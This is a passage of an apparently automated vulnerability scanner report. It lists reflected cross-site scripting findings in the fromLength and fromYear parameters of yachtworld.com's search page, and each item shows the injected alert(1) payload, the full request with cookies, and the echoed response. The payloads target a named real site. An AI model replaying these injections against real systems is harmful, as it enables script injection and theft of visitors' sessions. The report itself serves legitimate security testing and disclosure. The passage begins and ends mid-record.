HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:59 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 35248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
prop6="Used"
s.prop7="no search phrase entered"
s.prop8="24'-32'"
s.prop9=">2004"
s.prop10="no search phrase entered"
s.prop11="no search phrase entered"
s.prop12="no search phrase entered"
s.prop13="0f380a";alert(1)//06fb479cf89"
s.prop14="no search phrase entered"
s.prop15="no search phrase entered"
s.prop16="no search phrase entered"
s.prop17="United States"
s.prop18="no search phrase entered"
s.prop19="zero"
s.prop20="Home
...[SNIP]...

3.370. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [fromLength parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the fromLength request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 235b4'%3balert(1)//48e3f34999b was submitted in the fromLength parameter. This input was echoed as 235b4';alert(1)//48e3f34999b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&currencyid=100&cit=true&toLength=32&luom=126&fromLength=24235b4'%3balert(1)//48e3f34999b&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range&No=10 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.12.10.1296155952; s_pers=%20s_nr%3D1296156045407%7C1298748045407%3B%20s_lv%3D1296156045410%7C1390764045410%3B%20s_lv_s%3DFirst%2520Visit%7C1296157845410%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/cache/searchResults.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromY%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:59 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 93592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
/oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.yachtworld.com/en/opensearchresults.html';
OAS_listpos = 'Top1,Right1';
OAS_query = '&man=regulator&type=used&minyr=2004&minpr=0&minl=24235b4';alert(1)//48e3f34999b&maxl=32';
OAS_target = '_top';
OAS_version = 10;
OAS_rn = '001234567890';
OAS_rns = '1234567890';
OAS_rn = new String(Math.random()); OAS_rns = OAS_rn.substring(2, 11);

function OAS_NORMAL(pos)
{
d
...[SNIP]...

3.371. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [fromLength parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the fromLength request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce63f'%3balert(1)//95f22e921dffab3cc was submitted in the fromLength parameter. This input was echoed as ce63f';alert(1)//95f22e921dffab3cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?man=regulator&is=false&type=&luom=126&fromLength=24ce63f'%3balert(1)//95f22e921dffab3cc&toLength=32&fromYear=2004&toYear=&pricderange=Select+Price+Range&Ntt=&fromPrice=0&toPrice=&searchtype=homepage&cit=true&slim=quick&ybw=&sm=3&Ntk=boatsEN&currencyid=100 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/
Cache-Control: max-age=0
Origin: http://www.yachtworld.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; s_pers=%20s_nr%3D1296155951861%7C1298747951861%3B%20s_lv%3D1296155951863%7C1390763951863%3B%20s_lv_s%3DFirst%2520Visit%7C1296157751863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.2.10.1296155952; savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:57 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 94029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
/oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.yachtworld.com/en/opensearchresults.html';
OAS_listpos = 'Top1,Right1';
OAS_query = '&man=regulator&type=used&minyr=2004&minpr=0&minl=24ce63f';alert(1)//95f22e921dffab3cc&maxl=32';
OAS_target = '_top';
OAS_version = 10;
OAS_rn = '001234567890';
OAS_rns = '1234567890';
OAS_rn = new String(Math.random()); OAS_rns = OAS_rn.substring(2, 11);

function OAS_NORMAL(pos)
{
d
...[SNIP]...

3.372. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [fromYear parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the fromYear request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bd54'%3balert(1)//1b107f31ae9bf85d9 was submitted in the fromYear parameter. This input was echoed as 8bd54';alert(1)//1b107f31ae9bf85d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?man=regulator&is=false&type=&luom=126&fromLength=24&toLength=32&fromYear=20048bd54'%3balert(1)//1b107f31ae9bf85d9&toYear=&pricderange=Select+Price+Range&Ntt=&fromPrice=0&toPrice=&searchtype=homepage&cit=true&slim=quick&ybw=&sm=3&Ntk=boatsEN&currencyid=100 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/
Cache-Control: max-age=0
Origin: http://www.yachtworld.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; s_pers=%20s_nr%3D1296155951861%7C1298747951861%3B%20s_lv%3D1296155951863%7C1390763951863%3B%20s_lv_s%3DFirst%2520Visit%7C1296157751863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.2.10.1296155952; savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:12 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 95401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
AS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.yachtworld.com/en/opensearchresults.html';
OAS_listpos = 'Top1,Right1';
OAS_query = '&man=regulator&type=used&minyr=20048bd54';alert(1)//1b107f31ae9bf85d9&minpr=0&minl=24&maxl=32';
OAS_target = '_top';
OAS_version = 10;
OAS_rn = '001234567890';
OAS_rns = '1234567890';
OAS_rn = new String(Math.random()); OAS_rns = OAS_rn.substring(2, 11);

function OAS_
...[SNIP]...

3.373. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [fromYear parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the fromYear request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad4d1"style%3d"x%3aexpression(alert(1))"a06bc2d6d797995b7 was submitted in the fromYear parameter. This input was echoed as ad4d1"style="x:expression(alert(1))"a06bc2d6d797995b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /core/listing/cache/searchResults.jsp?man=regulator&is=false&type=&luom=126&fromLength=24&toLength=32&fromYear=2004ad4d1"style%3d"x%3aexpression(alert(1))"a06bc2d6d797995b7&toYear=&pricderange=Select+Price+Range&Ntt=&fromPrice=0&toPrice=&searchtype=homepage&cit=true&slim=quick&ybw=&sm=3&Ntk=boatsEN&currencyid=100 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/
Cache-Control: max-age=0
Origin: http://www.yachtworld.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; s_pers=%20s_nr%3D1296155951861%7C1298747951861%3B%20s_lv%3D1296155951863%7C1390763951863%3B%20s_lv_s%3DFirst%2520Visit%7C1296157751863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.2.10.1296155952; savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:11 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 96661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
<meta name="description" content="2004ad4d1"style="x:expression(alert(1))"a06bc2d6d797995b7 regulator Boats For Sale - YachtWorld.com">
...[SNIP]...

3.374. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [fromYear parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the fromYear request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1ce4"style%3d"x%3aexpression(alert(1))"feb11a15dbc was submitted in the fromYear parameter. This input was echoed as f1ce4"style="x:expression(alert(1))"feb11a15dbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /core/listing/cache/searchResults.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004f1ce4"style%3d"x%3aexpression(alert(1))"feb11a15dbc&sm=3&currencyid=100&cit=true&toLength=32&luom=126&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range&No=10 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.12.10.1296155952; s_pers=%20s_nr%3D1296156045407%7C1298748045407%3B%20s_lv%3D1296156045410%7C1390764045410%3B%20s_lv_s%3DFirst%2520Visit%7C1296157845410%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/cache/searchResults.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromY%252526ot%25253DA%3B

Response

3.375. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [fromYear parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the fromYear request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfcea'%3balert(1)//f3edb3a3b4f was submitted in the fromYear parameter. This input was echoed as cfcea';alert(1)//f3edb3a3b4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004cfcea'%3balert(1)//f3edb3a3b4f&sm=3&currencyid=100&cit=true&toLength=32&luom=126&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range&No=10 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7